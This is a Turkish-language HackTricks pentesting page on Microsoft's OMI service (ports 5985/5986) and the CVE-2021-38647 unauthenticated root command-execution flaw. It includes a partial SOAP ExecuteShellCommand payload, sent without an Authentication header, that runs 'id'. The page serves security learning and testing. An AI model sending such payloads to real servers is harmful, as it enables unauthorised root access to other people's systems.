hacktricks/network-services-pentesting/5985-5986-pentesting-omi.md

4.3 KiB
Raw Permalink Blame History

5985,5986 - Pentesting OMI

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Temel Bilgiler

OMI, Microsoft tarafından uzaktan yapılandırma yönetimi için tasarlanmış bir ık kaynak araç olarak sunulmaktadır. Özellikle aşağıdaki hizmetleri kullanan Azure'daki Linux sunucuları için önemlidir:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

Bu hizmetler etkinleştirildiğinde, omiengine süreci başlatılır ve root olarak tüm arayüzlerde dinler.

Kullanılan varsayılan portlar 5985 (http) ve 5986 (https)'dır.

CVE-2021-38647 Açığı

16 Eylül'de gözlemlendiği üzere, belirtilen hizmetlerle Azure'da dağıtılan Linux sunucuları, OMI'nin savunmasız bir versiyonu nedeniyle hassastır. Bu açık, OMI sunucusunun /wsman uç noktasındaki mesajları Authentication başlığı gerektirmeden işleme şeklidir ve istemcinin yanlış yetkilendirilmesine neden olur.

Bir saldırgan, Authentication başlığı olmadan "ExecuteShellCommand" SOAP yükü göndererek bunu istismar edebilir ve sunucunun root ayrıcalıklarıyla komutları yürütmesini zorlayabilir.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

Daha fazla bilgi için bu CVE'yi kontrol edin.

Referanslar

{% hint style="success" %} AWS Hacking öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %}